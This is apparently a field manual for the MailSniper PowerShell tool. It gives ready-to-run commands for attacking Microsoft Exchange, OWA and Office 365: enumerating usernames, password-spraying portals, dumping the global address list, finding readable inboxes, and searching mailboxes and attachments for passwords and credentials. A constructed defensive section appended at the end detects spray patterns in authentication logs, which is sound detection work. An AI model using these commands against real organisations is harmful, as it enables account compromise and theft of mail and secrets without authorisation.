MailSniper Field Manual
Additional Resources
Invoke-OpenInboxFinder: https://www.blackhillsinfosec.com/?p=5871
Twitter: @dafthack
1. Download the MailSniper.ps1 script from:
https://github.com/dafthack/MailSniper
2. Start a new PowerShell session from a command terminal.
C:\> powershell.exe -exec bypass
3. Import MailSniper.
PS C:\> Import-Module .\MailSniper.ps1

Harvest Domain
1. Harvest the internal domain name of the target org (mail.domain.com).
PS C:\> Invoke-DomainHarvestOWA -ExchHostname mail.domain.com

Harvest Usernames
1. Generate a list (userlist.txt) of potential usernames in the format ‘DOMAIN\username’ or ‘[email protected]’.
2. Harvest valid usernames from an OWA portal (mail.domain.com).
PS C:\> Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt

Password Spraying
1. Generate a list (userlist.txt) of usernames to password spray.
2. Choose a password (Summer2017).
3. Spray an OWA portal (mail.domain.com).
PS C:\> Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Summer2017 -Threads 15 -OutFile owa-sprayed-creds.txt
4. Or… Spray EWS.
PS C:\> Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Summer2017 -Threads 15 -OutFile sprayed-ews-creds.txt

Access Global Address List
1. Using a valid credential point Get-GlobalAddressList to either an OWA or EWS server (it will try both) and set the -UserName and -Password options accordingly.
PS C:\> Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Summer2017 -OutFile global-address-list.txt

1. With a list of valid email addresses (email-list.txt) point Get-ADUsernameFromEWS at an EWS portal. It will prompt for creds.
PS C:\> Get-ADUsernameFromEWS -EmailList email-list.txt -ExchHostname outlook.office365.com -Remote

Find Inboxes with Too Broad Permissions
1. Generate a list of email addresses (email-list.txt) to check if their mailbox is openly readable by other users.
2. Use Invoke-OpenInboxFinder against the target EWS server specifying the ExchHostname accordingly (works with O365 too). It will prompt for creds.
PS C:\> Invoke-OpenInboxFinder -EmailList email-list.txt -ExchHostname outlook.office365.com -Remote

Search Current Mailbox with Default Terms
1. On a domain-joined system specify the email address of the current domain user the PowerShell session is running as for the -Mailbox option. Invoke-SelfSearch will search the Inbox for the terms ‘password’, ‘creds’, and ‘credentials’.
PS C:\> Invoke-SelfSearch -Mailbox current-[email protected]

Search Current Mailbox with Custom Terms Against Remote Portal
1. Specify custom terms to search for with the -Terms option. Specifying the -Remote option will prompt for a user’s credentials. This can be used to search the inbox of a user remotely against an Internet facing EWS server (works for O365 too).
PS C:\> Invoke-SelfSearch -Mailbox current-[email protected] -ExchHostname mail.domain.com -Terms "*passwords*","*super secret*","*industrial control systems*","*scada*","*launch codes*" -Remote

Search Current Mailbox Including Attachments and Download Matches
1. Specifying the -CheckAttachments option will cause Invoke-SelfSearch or Invoke-GlobalMailSearch to search the current user’s mailbox for the default terms including attachments. It will download any attachments that match to ‘C:\temp’.
PS C:\> Invoke-SelfSearch -Mailbox current-[email protected] -CheckAttachments -DownloadDir C:\temp
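
Detection view of the Password Spraying steps above, as an added example that is not part of the original field manual or of MailSniper: one password tried across a user list shows up as a single source failing against many accounts, each only once or twice. The function name Find-SprayCandidate, the record fields, the thresholds and the sample rows are all assumptions constructed for illustration.

```powershell
# Constructed sample records (not real data). Assumed normalized shape: one row per
# authentication attempt against OWA/EWS, built from whatever source you collect.
$records = @'
Time,ClientIP,User,Endpoint,Result
2017-06-01T09:00:01Z,203.0.113.7,DOMAIN\alice,/EWS/Exchange.asmx,Fail
2017-06-01T09:00:01Z,203.0.113.7,DOMAIN\bob,/EWS/Exchange.asmx,Fail
2017-06-01T09:00:02Z,203.0.113.7,DOMAIN\carol,/EWS/Exchange.asmx,Fail
2017-06-01T09:00:02Z,203.0.113.7,DOMAIN\dave,/EWS/Exchange.asmx,Fail
2017-06-01T09:00:03Z,203.0.113.7,DOMAIN\erin,/EWS/Exchange.asmx,Success
2017-06-01T09:00:03Z,203.0.113.7,DOMAIN\frank,/EWS/Exchange.asmx,Fail
2017-06-01T09:00:04Z,203.0.113.7,DOMAIN\grace,/EWS/Exchange.asmx,Fail
2017-06-01T09:05:10Z,198.51.100.20,DOMAIN\heidi,/owa/auth.owa,Fail
2017-06-01T09:05:25Z,198.51.100.20,DOMAIN\heidi,/owa/auth.owa,Fail
2017-06-01T09:05:41Z,198.51.100.20,DOMAIN\heidi,/owa/auth.owa,Success
'@ | ConvertFrom-Csv

function Find-SprayCandidate {
    param(
        [Parameter(Mandatory)] [object[]] $Records,
        [int] $WindowMinutes = 10,        # fixed buckets; a burst can straddle two
        [int] $MinDistinctUsers = 5,      # assumed thresholds, tune per environment
        [double] $MaxFailsPerUser = 2
    )
    $windowTicks = $WindowMinutes * [timespan]::TicksPerMinute
    $Records |
        Group-Object ClientIP, { $t = ([datetimeoffset]$_.Time).UtcTicks; $t - ($t % $windowTicks) } |
        ForEach-Object {
            $attempts = $_.Group
            $fails    = @($attempts | Where-Object Result -eq 'Fail')
            $users    = @($fails | Group-Object User)   # case-insensitive distinct users
            # Spray shape: many accounts, each tried only once or twice from one source.
            if ($users.Count -ge $MinDistinctUsers -and
                ($fails.Count / $users.Count) -le $MaxFailsPerUser) {
                [pscustomobject]@{
                    ClientIP       = $attempts[0].ClientIP
                    FirstSeen      = $fails.Time | Sort-Object | Select-Object -First 1
                    FailedUsers    = $users.Count
                    Failures       = $fails.Count
                    Endpoints      = ($fails.Endpoint | Sort-Object -Unique) -join ','
                    # Accounts that authenticated from the same source: triage these first.
                    SucceededUsers = @($attempts | Where-Object Result -eq 'Success' |
                                       Select-Object -ExpandProperty User -Unique)
                }
            }
        }
}

Find-SprayCandidate -Records $records | Format-List
```

Per-account lockout counters do not catch this pattern because no single account accumulates failures; the grouping has to be by source and time window, and a low -Threads value or a long delay between passwords stretches the activity across more windows.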